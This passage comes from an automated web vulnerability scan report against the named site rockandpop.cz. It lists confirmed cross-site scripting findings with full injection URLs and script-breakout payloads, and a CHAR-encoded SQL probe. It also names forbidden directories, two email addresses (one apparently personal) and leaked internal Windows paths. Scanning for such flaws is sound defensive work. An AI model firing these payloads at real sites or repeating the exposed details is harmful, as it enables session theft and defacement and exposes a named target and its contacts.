  1803. URL: http://www.rockandpop.cz/underwood/login.php?request='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'&uwLanguage=cz
  1804. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1805. Injection URL: http://www.rockandpop.cz/underwood/index.php?changeUwLanguage=1&request=3&uwLanguage=cz%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000714)%3C%2Fscript%3E
  1806. Parameter Name: request
  1807. Parameter Type: Querystring
  1808. Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
  1809.  
  1810. Permanent XSS is a dangerous issue that has many exploitation vectors, some of which include:
  1811. User session sensitive information such as cookies can be stolen.
  1812. XSS can enable client-side worms which could modify, delete or steal other users' data within the application.
  1813. The website can be redirected to a new location, defaced or used as a phishing site.
  1814.  
  1815. ||| [Possible] Cross-site Scripting
  1816.  
  1817. Severity : Medium
  1818. Confirmation: Confirmed
  1819. URL: http://www.rockandpop.cz/underwood/?'"--></style></script><script>alert(0x0000BE)</script>
  1820. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1821. Notes: This page responds with an HTTP redirect status, so the detected XSS vulnerability might not be exploitable in many conditions; however, it still indicates a lack of correct filtering and should be addressed.
  1822. Parameter Name: Query Based
  1823. Parameter Type: FullQueryString
  1824. Attack Pattern: '"--></style></script><script>netsparker(0x0000BE)</script>
  1825.  
  1826. Severity : Medium
  1827. Confirmation: Confirmed
  1828. URL: http://www.rockandpop.cz/underwood/index.php?changeUwLanguage=1&request=3&uwLanguage='"--></style></script><script>alert(0x0006FB)</script>
  1829. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1830. Notes: This page responds with an HTTP redirect status, so the detected XSS vulnerability might not be exploitable in many conditions; however, it still indicates a lack of correct filtering and should be addressed.
  1831. Parameter Name: uwLanguage
  1832. Parameter Type: Querystring
  1833. Attack Pattern: '"--></style></script><script>netsparker(0x0006FB)</script>
  1834.  
  1835. Severity : Medium
  1836. Confirmation: Confirmed
  1837. URL: http://www.rockandpop.cz/underwood/index.php/" stYle="x:expre/**/ssion(alert(9))
  1838. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1839. Notes: This page responds with an HTTP redirect status, so the detected XSS vulnerability might not be exploitable in many conditions; however, it still indicates a lack of correct filtering and should be addressed.
  1840. Parameter Name: URI-BASED
  1841. Parameter Type: RawUrlInjection
  1842. Attack Pattern: /" stYle="x:expre/**/ssion(netsparker(9))
  1843.  
  1844.  
  1845. Severity : Medium
  1846. Confirmation: Confirmed
  1847. Detection Accuracy :
  1848. URL: http://www.rockandpop.cz/underwood/index.php?'"--></style></script><script>alert(0x0007EA)</script>
  1849. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  1850. Notes: This page responds with an HTTP redirect status, so the detected XSS vulnerability might not be exploitable in many conditions; however, it still indicates a lack of correct filtering and should be addressed.
  1851. Parameter Name: Query Based
  1852. Parameter Type: FullQueryString
  1853. Attack Pattern: '"--></style></script><script>netsparker(0x0007EA)</script>
  1854.  
  1855. ||| Forbidden Resource
  1856.  
  1857. Summary
  1858. Severity : Information
  1859. Confirmation: Confirmed
  1860. URL:
  1861.  
  1862. http://www.rockandpop.cz/js/swfupload/
  1863. http://www.rockandpop.cz/img/
  1864. http://www.rockandpop.cz/js/
  1865. http://www.rockandpop.cz/underwood/download/
  1866. http://www.rockandpop.cz/underwood/download/files/
  1867. http://www.rockandpop.cz/cache/images/topNewsBig/
  1868. http://www.rockandpop.cz/cache/images/
  1869. http://www.rockandpop.cz/cache/
  1870. http://www.rockandpop.cz/cache/images/topNewsSmall/
  1871. http://www.rockandpop.cz/cache/images/newsSmall/
  1872.  
  1873. ||| E-mail Address Disclosure
  1874.  
  1875. Severity : Information
  1876. Found E-mails:
  1877.  
  1878. online@rockandpop.cz
  1879. lichnovsky-zdenek@centrum.cz
  1880.  
  1881. ||| [Possible] Internal Path Leakage (Windows)
  1882.  
  1883. Severity : Information
  1884. Confirmation: Confirmed
  1885. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
  1886. Identified Internal Path(s):
  1887.  
  1888. C:\Users\DAVIDX~1\AppData\Local\Temp\msohtmlclip1\01
  1889. C:\temp\msohtml1\01
  1890. C:\DOCUME~1\Ersian\LOCALS~1\Temp\msohtml1\01
  1891.  
  1892. By © SHERWOOD Media s.r.o.